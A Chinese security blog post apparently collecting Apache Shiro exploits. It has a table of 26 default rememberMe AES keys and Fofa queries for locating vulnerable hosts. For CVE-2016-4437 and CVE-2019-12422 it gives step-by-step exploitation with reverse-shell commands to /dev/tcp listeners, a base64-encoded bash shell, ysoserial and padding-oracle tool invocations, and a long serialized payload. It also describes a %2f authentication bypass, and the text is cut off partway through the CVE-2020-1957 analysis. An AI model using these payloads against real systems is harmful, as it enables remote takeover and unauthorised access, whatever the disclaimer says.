<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"cgw-f.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Shiro反序列漏洞集合免责声明 ​        本文技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他违法行为。 漏洞介绍与知识补充​    Apache Sh">
<meta property="og:type" content="article">
<meta property="og:title" content="shiro反序列化漏洞集合">
<meta property="og:url" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/index.html">
<meta property="og:site_name" content="北极星上的稻草人">
<meta property="og:description" content="Shiro反序列漏洞集合免责声明 ​        本文技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他违法行为。 漏洞介绍与知识补充​    Apache Sh">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813181426684.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813181439922.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813183906465.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813183920110.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184309614.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184327784.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184344695.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184353276.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184437756.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185051542.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185238889.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185337503.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185354022.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185455706.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185548331.png">
<meta property="og:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185555497.png">
<meta property="article:published_time" content="2023-08-13T10:00:08.000Z">
<meta property="article:modified_time" content="2023-08-14T12:16:08.797Z">
<meta property="article:author" content="北极星上的稻草人">
<meta property="article:tag" content="实战漏洞">
<meta property="article:tag" content="攻防演练">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813181426684.png">

<link rel="canonical" href="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>shiro反序列化漏洞集合 | 北极星上的稻草人</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">北极星上的稻草人</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">稻草人笔记</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">13</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">11</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">87</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://cgw-f.github.io/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="北极星上的稻草人">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="北极星上的稻草人">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          shiro反序列化漏洞集合
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-08-13 18:00:08" itemprop="dateCreated datePublished" datetime="2023-08-13T18:00:08+08:00">2023-08-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-08-14 20:16:08" itemprop="dateModified" datetime="2023-08-14T20:16:08+08:00">2023-08-14</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">漏洞</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%BC%8F%E6%B4%9E/%E5%AE%9E%E6%88%98%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">实战漏洞</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Shiro反序列漏洞集合"><a href="#Shiro反序列漏洞集合" class="headerlink" title="Shiro反序列漏洞集合"></a>Shiro反序列漏洞集合</h1><p><strong>免责声明</strong></p>
<p>​        <strong>本文技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他违法行为</strong>。</p>
<h2 id="漏洞介绍与知识补充"><a href="#漏洞介绍与知识补充" class="headerlink" title="漏洞介绍与知识补充"></a>漏洞介绍与知识补充</h2><p>​    Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。</p>
<p><strong>【已知指纹</strong>】</p>
<p>若依CMS、TIMO后台管理系统</p>
<p>Bp抓包：在登陆界面勾线记住密码，进行抓包，找remeberMe字段。</p>
<p>【<strong>Fofa语法</strong>】</p>
<ul>
<li><p> “shiro” &amp;&amp;“管理系统”</p>
</li>
<li><p> header=“rememberme=deleteMe”、header=“shiroCookie”</p>
</li>
</ul>
<p>【<strong>注意</strong>】shiro反序列化漏洞并不需要正确的账号密码，触发漏洞的点是在于反序列化过程，需要密钥Key，是因为要把攻击payload解密回正确的payload（否则解密出乱码）；然后利用反序列化的利用链进行触发反序列化漏洞。</p>
<p><strong>Shiro默认key集合</strong></p>
<table>
<thead>
<tr>
<th>序号</th>
<th>shiro版本</th>
<th>默认密钥</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td></td>
<td>kPH+bIxk5D2deZiIxcaaaA==</td>
</tr>
<tr>
<td>2</td>
<td></td>
<td>4AvVhmFLUs0KTA3Kprsdag==</td>
</tr>
<tr>
<td>3</td>
<td></td>
<td>3AvVhmFLUs0KTA3Kprsdag==</td>
</tr>
<tr>
<td>4</td>
<td></td>
<td>2AvVhdsgUs0FSA3SDFAdag==</td>
</tr>
<tr>
<td>5</td>
<td></td>
<td>6ZmI6I2j5Y+R5aSn5ZOlAA==</td>
</tr>
<tr>
<td>6</td>
<td></td>
<td>wGiHplamyXlVB11UXWol8g==</td>
</tr>
<tr>
<td>7</td>
<td></td>
<td>cmVtZW1iZXJNZQAAAAAAAA==</td>
</tr>
<tr>
<td>8</td>
<td></td>
<td>Z3VucwAAAAAAAAAAAAAAAA==</td>
</tr>
<tr>
<td>9</td>
<td></td>
<td>ZnJlc2h6Y24xMjM0NTY3OA==</td>
</tr>
<tr>
<td>10</td>
<td></td>
<td>L7RioUULEFhRyxM7a2R/Yg==</td>
</tr>
<tr>
<td>11</td>
<td></td>
<td>RVZBTk5JR0hUTFlfV0FPVQ==</td>
</tr>
<tr>
<td>12</td>
<td></td>
<td>fCq+/xW488hMTCD+cmJ3aQ==</td>
</tr>
<tr>
<td>13</td>
<td></td>
<td>WkhBTkdYSUFPSEVJX0NBVA==</td>
</tr>
<tr>
<td>14</td>
<td></td>
<td>1QWLxg+NYmxraMoxAXu/Iw==</td>
</tr>
<tr>
<td>15</td>
<td></td>
<td>WcfHGU25gNnTxTlmJMeSpw==</td>
</tr>
<tr>
<td>16</td>
<td></td>
<td>a2VlcE9uR29pbmdBbmRGaQ==</td>
</tr>
<tr>
<td>17</td>
<td></td>
<td>bWluZS1hc3NldC1rZXk6QQ==</td>
</tr>
<tr>
<td>18</td>
<td></td>
<td>5aaC5qKm5oqA5pyvAAAAAA==</td>
</tr>
<tr>
<td>19</td>
<td></td>
<td>ZWvohmPdUsAWT3=KpPqda</td>
</tr>
<tr>
<td>20</td>
<td></td>
<td>r0e3c16IdVkouZgk1TKVMg==</td>
</tr>
<tr>
<td>21</td>
<td></td>
<td>ZUdsaGJuSmxibVI2ZHc9PQ==</td>
</tr>
<tr>
<td>22</td>
<td></td>
<td>U3ByaW5nQmxhZGUAAAAAAA==</td>
</tr>
<tr>
<td>23</td>
<td></td>
<td>LEGEND-CAMPUS-CIPHERKEY==</td>
</tr>
<tr>
<td>24</td>
<td></td>
<td>kPv59vyqzj00x11LXJZTjJ2UHW48jzHN</td>
</tr>
<tr>
<td>25</td>
<td></td>
<td>LEGEND-CAMPUS-CIPHERKEY==</td>
</tr>
<tr>
<td>26</td>
<td></td>
<td>kPv59vyqzj00x11LXJZTjJ2UHW48jzHN</td>
</tr>
</tbody></table>
<h2 id="RememberMe-RCE-550（CVE-2016-4437）"><a href="#RememberMe-RCE-550（CVE-2016-4437）" class="headerlink" title="RememberMe RCE-550（CVE-2016-4437）"></a>RememberMe RCE-550（CVE-2016-4437）</h2><h3 id="0x01-漏洞介绍-原理"><a href="#0x01-漏洞介绍-原理" class="headerlink" title="0x01 漏洞介绍/原理"></a>0x01 漏洞介绍/原理</h3><p>​        Apache Shiro框架提供了记住我（RememberMe）的功能，关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRememberMeManager对rememberMe的cookie执行操作在客户端进行，如操作j，服务器端识别身份解密处理cookie的流程为操作k：</p>
<ul>
<li><p><strong>（客户端/浏览器）操作j：序列化⟶AES加密⟶Base64编码</strong></p>
</li>
<li><p><strong>（服务器）操作</strong>k<strong>：获取rememberMe cookie⟶base64 解码⟶AES解密（加密密钥硬编码）⟶反序列化（未作过滤处理）</strong></p>
</li>
</ul>
<p>【<strong>漏洞所在</strong>】</p>
<p>​        AES加密的默认密钥Key写死在官方的代码里(密钥初始就被定义好不能动态改变的)，这就意味着可以通过源代码都能拿到AES加密的默认密钥。因此，攻击者可以构造一个恶意的对象，并且对其序列化、AES加密、base64编码后，作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化，最终就造成了反序列化的RCE漏洞。只要rememberMe的AES加密密钥泄露，无论shiro是什么版本都可能会导致该漏洞的产生。</p>
<h3 id="0x02-漏洞环境-测绘指纹"><a href="#0x02-漏洞环境-测绘指纹" class="headerlink" title="0x02 漏洞环境/测绘指纹"></a>0x02 漏洞环境/测绘指纹</h3><p>Apache Shiro &lt;= 1.2.4</p>
<p>指纹：shiro通用指纹</p>
<h3 id="0x03-POC-EXP-漏洞利用"><a href="#0x03-POC-EXP-漏洞利用" class="headerlink" title="0x03 POC/EXP/漏洞利用"></a>0x03 POC/EXP/漏洞利用</h3><ul>
<li><strong>步骤1：制作bash反弹shell</strong></li>
</ul>
<p><strong>执行命令/shell</strong>：<code>bash -i &gt;&amp; /dev/tcp/127.0.0.1/63497 0&gt;&amp;1</code>    #监听ip，监听端口</p>
<p><strong>Base64编码</strong>：</p>
<p><code>YmFzaCAtaSA+JiAvZGV2L3RjcC8yNy4xNTUuODcuODkvMzI0NjAgMD4mMQ==</code></p>
<p><strong>反弹Shell/payload</strong>：</p>
<p><code>bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yNy4xNTUuODcuODkvMzI0NjAgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;</code></p>
<ul>
<li> <strong>步骤2：使用工具（shiro_exp.py）执行bash反弹shell</strong></li>
</ul>
<p>攻击者监听端口：<code>nc -lvvp 4444</code></p>
<p>执行攻击，payload如下：</p>
<p><code>Python .\exp.py -t -u http://目标ip：端口/doLogin -p ‘bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yNy4xNTUuODcuODkvMzI0NjAgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;</code></p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813181426684.png" alt="image-20230813181426684">                    </p>
<p>反弹shell成功</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813181439922.png" alt="image-20230813181439922"></p>
<h2 id="远程安全限制绕过漏洞（CVE-2016-6802）"><a href="#远程安全限制绕过漏洞（CVE-2016-6802）" class="headerlink" title="远程安全限制绕过漏洞（CVE-2016-6802）"></a>远程安全限制绕过漏洞（CVE-2016-6802）</h2><h3 id="0x01-漏洞介绍"><a href="#0x01-漏洞介绍" class="headerlink" title="0x01 漏洞介绍"></a>0x01 漏洞介绍</h3><p><strong>【漏洞类型</strong>】：未授权访问</p>
<p>​        shiro在路径控制的时候，未能对传入的url编码进行decode解码，导致攻击者可以绕过过滤器，访问被过滤的路径。</p>
<h3 id="0x02-漏洞环境-测绘指纹-1"><a href="#0x02-漏洞环境-测绘指纹-1" class="headerlink" title="0x02 漏洞环境/测绘指纹"></a>0x02 漏洞环境/测绘指纹</h3><p>shrio &lt;1.3.2</p>
<h3 id="0x03-POC-EXP-漏洞利用-1"><a href="#0x03-POC-EXP-漏洞利用-1" class="headerlink" title="0x03 POC/EXP/漏洞利用"></a>0x03 POC/EXP/漏洞利用</h3><p>​        访问某shrio某些敏感url的时候（如/admin），页面返回403（未授权）。因此可以确定admin路径是属于被过滤路径。此时使用burp截断，然后在访问路径的最后添加%2f，既可绕过shiro检测。因为对于浏览器来说%2f会被自动编码为/，但是burp截断之后进入shiro，shiro未对其解码，所以可以绕过。</p>
<h2 id="Padding-Oracle-AttackRCE-721（CVE-2019-12422）"><a href="#Padding-Oracle-AttackRCE-721（CVE-2019-12422）" class="headerlink" title="Padding Oracle AttackRCE-721（CVE-2019-12422）"></a>Padding Oracle AttackRCE-721（CVE-2019-12422）</h2><h3 id="0x01-漏洞介绍-1"><a href="#0x01-漏洞介绍-1" class="headerlink" title="0x01 漏洞介绍"></a>0x01 漏洞介绍</h3><p>​        shrio中的remenbermecookie字段是采用AES-128-CBC加密的，因此容易受到oracle填充攻击，攻击者可以采用有效的cookie字段来作为paddingoracleattack的前缀，然后精心构造反序列化字段进行命令执行。</p>
<h3 id="0x02-漏洞环境-测绘指纹-2"><a href="#0x02-漏洞环境-测绘指纹-2" class="headerlink" title="0x02 漏洞环境/测绘指纹"></a>0x02 漏洞环境/测绘指纹</h3><ul>
<li><p>Apache     Shiro： 1.2.5, 1.2.6, 1.3.0, 1.3.1,     1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1</p>
</li>
<li><p>利用的前提：需要能够获取正常的remenberMe的cookie，所以我们需要进入后台，获取正常的cookie</p>
</li>
</ul>
<h3 id="0x03-POC-EXP-漏洞利用-2"><a href="#0x03-POC-EXP-漏洞利用-2" class="headerlink" title="0x03 POC/EXP/漏洞利用"></a>0x03 POC/EXP/漏洞利用</h3><ul>
<li><strong>步骤1：ysoserial生成反序列化payload</strong></li>
</ul>
<p>执行：<code>java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 bash -i &gt;&amp; /dev/tcp/xx.xx.xx.xx/4444 0&gt;&amp;1’ &gt; linux_shell.class</code></p>
<p>工具包： ysoserial-0.0.6-SNAPSHOT-all.jar</p>
<p>得到payload</p>
<p>CVLt9Uxe8Y+wYtBAg8OqeYytEKI04csCy916LpA8ndWPk0GHmv7iFB8nZIsnZmS00MLpOgHQD3+KRUlVQA09b7HFgios2tfD3ja6dKwoE4n4Y6h6tX2oZMwedIpmIBp59a6V8qqSk9chl1epO9up3ZJKrvQLs6CgRoA10Q4ZK0Jy00DQmFWWAvNI22tf4P68R/i2jOSSZ3+0KXme04jIWbYjcY7jVtD8RqehLDjHVxARWp8LVROQhHov2Gk2pEbXQs5MTF7sw1Nf6gcP6B1JizNWNvy23D0QVlGCqwu3qvwDaC2WUZm87DUr3fsOY6yOaDBk/Gpx1G6RJHN8LHJQ8zJVUfPJTX156B2ABq00xtCrXxjOWQpDVCrqjRoNHZ3qYVDITv7k/1Tmmwgayjv8F5nWLP+feY+oKIjt+eW5JVs0Ky2hbjDHin8KefdcuA+wK34NFyIbZi0abIjhKmqval5h/IjE6xMiGcA3Dsi/cuJGhHp0YbcWYuyxAfVCa15V</p>
<ul>
<li><strong>步骤2（方式1）：使用PaddingOracleAttack-1.0-SNAPSHOT.jar进行漏洞利用</strong></li>
</ul>
<p><code>java -jar PaddingOracleAttack-1.0-SNAPSHOT.jar http://xx.xx.xx.xx:8080/</code> CVLt9Uxe8Y+wYtBAg8OqeYytEKI04csCy916LpA8ndWPk0GHmv7iFB8nZIsnZmS00MLpOgHQD3+KRUlVQA09b7HFgios2tfD3ja6dKwoE4n4Y6h6tX2oZMwedIpmIBp59a6V8qqSk9chl1epO9up3ZJKrvQLs6CgRoA10Q4ZK0Jy00DQmFWWAvNI22tf4P68R/i2jOSSZ3+0KXme04jIWbYjcY7jVtD8RqehLDjHVxARWp8LVROQhHov2Gk2pEbXQs5MTF7sw1Nf6gcP6B1JizNWNvy23D0QVlGCqwu3qvwDaC2WUZm87DUr3fsOY6yOaDBk/Gpx1G6RJHN8LHJQ8zJVUfPJTX156B2ABq00xtCrXxjOWQpDVCrqjRoNHZ3qYVDITv7k/1Tmmwgayjv8F5nWLP+feY+oKIjt+eW5JVs0Ky2hbjDHin8KefdcuA+wK34NFyIbZi0abIjhKmqval5h/IjE6xMiGcA3Dsi/cuJGhHp0YbcWYuyxAfVCa15V 16 shell.class</p>
<p>得到破解结果后burpsuite重放替换cookie后的数据包，成功反弹shell</p>
<ul>
<li><strong>步骤2（方式2）：使用shiro_exp.py进行漏洞利用</strong></li>
</ul>
<p>python2 shiro_exp.py <a target="_blank" rel="noopener" href="http://xx.xx.xx.xx:8080/samples-web-1.4.1/home.jspCVLt9Uxe8Y+wYtBAg8OqeYytEKI04csCy916LpA8ndWPk0GHmv7iFB8nZIsnZmS00MLpOgHQD3+KRUlVQA09b7HFgios2tfD3ja6dKwoE4n4Y6h6tX2oZMwedIpmIBp59a6V8qqSk9chl1epO9up3ZJKrvQLs6CgRoA10Q4ZK0Jy00DQmFWWAvNI22tf4P68R/i2jOSSZ3+0KXme04jIWbYjcY7jVtD8RqehLDjHVxARWp8LVROQhHov2Gk2pEbXQs5MTF7sw1Nf6gcP6B1JizNWNvy23D0QVlGCqwu3qvwDaC2WUZm87DUr3fsOY6yOaDBk/Gpx1G6RJHN8LHJQ8zJVUfPJTX156B2ABq00xtCrXxjOWQpDVCrqjRoNHZ3qYVDITv7k/1Tmmwgayjv8F5nWLP+feY+oKIjt+eW5JVs0Ky2hbjDHin8KefdcuA+wK34NFyIbZi0abIjhKmqval5h/IjE6xMiGcA3Dsi/cuJGhHp0YbcWYuyxAfVCa15V">http://xx.xx.xx.xx:8080/samples-web-1.4.1/home.jspCVLt9Uxe8Y+wYtBAg8OqeYytEKI04csCy916LpA8ndWPk0GHmv7iFB8nZIsnZmS00MLpOgHQD3+KRUlVQA09b7HFgios2tfD3ja6dKwoE4n4Y6h6tX2oZMwedIpmIBp59a6V8qqSk9chl1epO9up3ZJKrvQLs6CgRoA10Q4ZK0Jy00DQmFWWAvNI22tf4P68R/i2jOSSZ3+0KXme04jIWbYjcY7jVtD8RqehLDjHVxARWp8LVROQhHov2Gk2pEbXQs5MTF7sw1Nf6gcP6B1JizNWNvy23D0QVlGCqwu3qvwDaC2WUZm87DUr3fsOY6yOaDBk/Gpx1G6RJHN8LHJQ8zJVUfPJTX156B2ABq00xtCrXxjOWQpDVCrqjRoNHZ3qYVDITv7k/1Tmmwgayjv8F5nWLP+feY+oKIjt+eW5JVs0Ky2hbjDHin8KefdcuA+wK34NFyIbZi0abIjhKmqval5h/IjE6xMiGcA3Dsi/cuJGhHp0YbcWYuyxAfVCa15V</a> shell.class</p>
<ul>
<li><strong>步骤2-1：经过漫长的时间后得到cookie，然后替代刚抓包的cookie，重放即可</strong></li>
</ul>
<h2 id="Shiro-spring时身份验证绕过漏洞分析（CVE-2020-1957）"><a href="#Shiro-spring时身份验证绕过漏洞分析（CVE-2020-1957）" class="headerlink" title="Shiro + spring时身份验证绕过漏洞分析（CVE-2020-1957）"></a>Shiro + spring时身份验证绕过漏洞分析（CVE-2020-1957）</h2><h3 id="0x01-漏洞介绍-2"><a href="#0x01-漏洞介绍-2" class="headerlink" title="0x01 漏洞介绍"></a>0x01 漏洞介绍</h3><p>【<strong>漏洞类型</strong>】未授权访问（绕过）</p>
<h3 id="0x02-漏洞原理"><a href="#0x02-漏洞原理" class="headerlink" title="0x02 漏洞原理"></a>0x02 漏洞原理</h3><p>【<strong>知识补充1】Shiro拦截器</strong></p>
<p>​        Shiro框架通过拦截器功能来实现对用户访问权限的控制和拦截。Shiro中常见的拦截器有anon,authc等拦截器。</p>
<ul>
<li><p><strong>anon匿名拦截器</strong>，不需要登录就能访问，一般用于静态资源,或者移动端接口</p>
</li>
<li><p> <strong>authc登录拦截器</strong>，需要登录认证才能访问的资源。</p>
</li>
</ul>
<p>配置示例</p>
<p>​        index.html = anon</p>
<p>​        /user/** = authc</p>
<p>​        访问 /index.html主页的时候，Shiro将不会对其进行登录判断，anon拦截器不需要登录就能进行访问。而对于/user/xiaoming 等 /user/xiaogang等接口，authc拦截器将会对其进行登录判断，有登录认证才能访问资源。</p>
<p>【<strong>知识补充2</strong>】Ant 格式的url</p>
<p><strong>路径通配符</strong></p>
<ul>
<li><p> **?**：匹配一个字符</p>
</li>
<li><p> *****：匹配零个或多个字符串</p>
</li>
<li><p> <strong>**</strong>：匹配路径中的零个或多个路径</p>
</li>
<li><p> <strong>;</strong> <strong>：</strong>截段分隔符</p>
</li>
</ul>
<p>【<strong>原理</strong>】</p>
<p>​     <strong>一句话总结：若访问/hello/1需要授权，但用/hello/1/可以绕过shiro路径匹配函数，到spring拦截器时，/hello/1/与/hello/1是一样的。</strong>具体原理细节如下：</p>
<p>​        Shiro处理url时，会调用PathMatchingFilterChainResolver的getChain函数，<strong>getChain函数根</strong>据URL路径匹配中配置的url路径表达式来匹配输入的URL，判断是否匹配拦截器，匹配成功将会返回响应的拦截器执行链，让ShiroFither执行权限操作的。</p>
<p>​        getChain主要通过<strong>pathMathches函数</strong>进行匹配路径表达式。pathMatches函数最终会调用shiro.util.AntPathMatcher类中的<strong>doMatch</strong>对于ant格式的pathPattern和requestURI进行匹配。</p>
